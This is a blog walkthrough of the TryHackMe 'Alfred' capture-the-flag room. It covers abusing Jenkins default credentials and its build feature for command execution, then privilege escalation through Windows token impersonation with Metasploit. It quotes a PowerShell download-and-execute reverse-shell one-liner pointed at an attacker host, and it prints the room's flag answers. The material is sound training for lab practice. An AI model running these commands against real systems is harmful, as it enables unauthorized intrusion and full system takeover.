Open in app

Sign in

Write

Sign in

Alfred : TryHackMe Writeup

0liverFlow
8 min readJun 22, 2023

--

Alfred — THM

Alfred is an interesting room on TryHackMe that consists of exploiting Jenkins to gain an initial shell, then escalate your privileges by exploiting Windows authentication tokens.

In this walkthrough, you will learn how to :

  • Exploit a security misconfiguration vulnerability
  • Gain an initial access to the target system using Nishang’s Invoke-PowerShellTcp reverse shell script.
  • Switch from a command shell to a meterpreter shell
  • Exploit windows authentication tokens to escalate your privileges

[Task 1] — Initial access

In this room, we’ll learn how to exploit a common misconfiguration on a widely used automation server (Jenkins — This tool is used to create continuous integration/continuous development pipelines that allow developers to automatically deploy their code once they made changes to it). After which, we’ll use an interesting privilege escalation method to get full system access.

Since this is a Windows application, we’ll be using Nishang to gain initial access. The repository contains a useful set of scripts for initial access, enumeration and privilege escalation. In this case, we’ll be using the reverse shell scripts.

1°) How many ports are open? (TCP only)

Answer: 3 ✅

Nmap Syn Scan

2°) What is the username and password for the login panel? (in the format username:password)

In order to find the login panel’s username and password, we are going to use hydra.

Nevertheless, before using hydra we first need to find the HTTP method used as well as the parameters involved during the request submission.

For that, we are going to intercept the request using Burp suite’s Proxy feature.

Burp Suite Proxy

Answer: admin:admin ✅

Nevertheless, a faster way to determine the credentials would simply consist of asking our best friend “Google” :

After taking a look at the different webpages, it was clear that the default username was admin. However, i struggled a bit before finding the default password. I tried “password” but it didn’t work. Then, i found the answer thanks to stackoverflow \o/

NOTE📝: When it comes to find a CMS or any particular technology’s credentials, it always a good practice to google for default credentials before attempting any brute force attack. This will save a huge amount of time.

3°)

Find a feature of the tool that allows you to execute commands on the underlying system. When you find this feature, you can use this command to get the reverse shell on your machine and then run it: powershell iex (New-Object Net.WebClient).DownloadString(‘http://your-ip:your-port/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port

Jenkins server welcome page

You first need to download the Powershell script and make it available for the server to download. You can do this by creating an http server with python: python3 -m http.server.

For that, we are going to first download Nishang’s Invoke-PowerShellTcp script which can be used to connect to a standard netcat listening on a port when using the -Reverse switch.

Let’s now launch a python web server in order to download the script on the target system.

Once the Python web server launched, we will use the jenkins server’s configure feature in order to configure the project.

NOTE📝: Do not forget to specify the Windows command to execute in the Build section. Then apply and save.

The figures below show you that can be done:

After applying and saving the configuration on the Configuration Tab, let’s set up a Python web server and a netcat listener in order to download the powershell script and receive the reverse shell respectively.

Once the listener and the python server set up, let’s download and run the Invoke-PowerShellTcp script using the jenkins server’s build now feature:

Great, let’s now take a look at our Python web server and the netcat listener:

Downloading the Invoke-PowerShellTcp script
Receiving a reverse shell

4°) What is the user.txt flag?

Answer: 79007a09481963edf2e1321abd9ae2a0 ✅

[Task 2 ] — Switching Shells

Generating a payload using msfevom:

Let’s break down msfvenom’s options:

-p : the payload to use

-a : the architecture to use (x86 for 32-bit architecture and x64 for 64-bit architecture)

-e : the encoder to use (The purpose of encoding a payload is to make it less detectable by anti-virus software).

-i : the number of times to encode the payload.

-f : output format to use

-o : save the payload to a file

What is the final size of the exe payload that you generated?

Answer: 73802 ✅

Running a Python HTTP server:

Downloading the payload on the target system using certutil command:

Checking our Python http server:

Setting up a Metasploit handler:

Running the payload on the target system:

Checking if we got a meterpreter shell:

[Task 3] — Privilege Escalation

Now that we have initial access, let’s use token impersonation to gain system access.

Windows uses tokens to ensure that accounts have the right privileges to carry out particular actions. Account tokens are assigned to an account when users log in or are authenticated. This is usually done by LSASS.exe(think of this as an authentication process).

This access token consists of:

  • User SIDs(security identifier)
  • Group SIDs
  • Privileges

Amongst other things. More detailed information can be found here.

There are two types of access tokens:

  • Primary access tokens: those associated with a user account that are generated on log on.
  • Impersonation tokens: these allow a particular process(or thread in a process) to gain access to resources using the token of another (user/client) process.

For an impersonation token, there are different levels:

  • SecurityAnonymous: current user/client cannot impersonate another user/client.
  • SecurityIdentification: current user/client can get the identity and privileges of a client but cannot impersonate the client.
  • SecurityImpersonation: current user/client can impersonate the client’s security context on the local system
  • SecurityDelegation: current user/client can impersonate the client’s security context on a remote system

Where the security context is a data structure that contains users’ relevant security information.

The privileges of an account(which are either given to the account when created or inherited from a group) allow a user to carry out particular actions. Here are the most commonly abused privileges:

  • SeImpersonatePrivilege
  • SeAssignPrimaryPrivilege
  • SeTcbPrivilege
  • SeBackupPrivilege
  • SeRestorePrivilege
  • SeCreateTokenPrivilege
  • SeLoadDriverPrivilege
  • SeTakeOwnershipPrivilege
  • SeDebugPrivilege

NOTE📝: The process of impersonating access tokens to elevate our privileges on a system will depend on the privileges assigned to the account that has been exploited to gain initial access as well as the impersonation or delegation tokens available.

There’s more reading here.

1°) View all the privileges using whoami /priv

An alternative to whoami /priv consists of using the meterpreter’s getprivs command as follows:

2°) You can see that two privileges(SeDebugPrivilege, SeImpersonatePrivilege) are enabled. Let’s use the incognito module that will allow us to exploit this vulnerability.

Enter: load incognito to load the incognito module in Metasploit. Please note that you may need to use the use incognito command if the previous command doesn’t work. Also, ensure that your Metasploit is up to date.

The Incognito module is a built-in meterpreter module that was originally a standalone application that allows you to impersonate user tokens after successful exploitation.

3°) To check which tokens are available, enter the list_tokens -g. We can see that the BUILTIN\Administrators token is available.

Use the impersonate_token “BUILTIN\Administrators” command to impersonate the Administrators’ token. What is the output when you run the getuid command?

Let’s first take a look at the help menu of the list_tokens command:

Delegation-level tokens
Impersonation -level tokens

Answer: NT AUTHORITY\SYSTEM ✅

4°) Even though you have a higher privileged token, you may not have the permissions of a privileged user (this is due to the way Windows handles permissions — it uses the Primary Token of the process and not the impersonated token to determine what the process can or cannot do).

Ensure that you migrate to a process with correct permissions (the above question’s answer). The safest process to pick is the services.exe process. First, use the ps command to view processes and find the PID of the services.exe process. Migrate to this process using the command migrate PID-OF-PROCESS

5°) Read the root.txt file located at C:\Windows\System32\config

Answer: dff0f748678f280250f25a45b8046b4a ✅

Well done guys 👏!

That’s all for this Capture The Flag.

Do not forget to click on the little clap icon below if you enjoyed the content.

Furthermore, thanks for subscribing to my newsletter to keep up with my latest articles.

Alfred
Jenkins
Ctf
Tryhackme
Windows

--

--

0liverFlow
0liverFlow

Written by 0liverFlow

144 Followers
3 Following

Pentester | Enjoy breaking and building stuffs

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams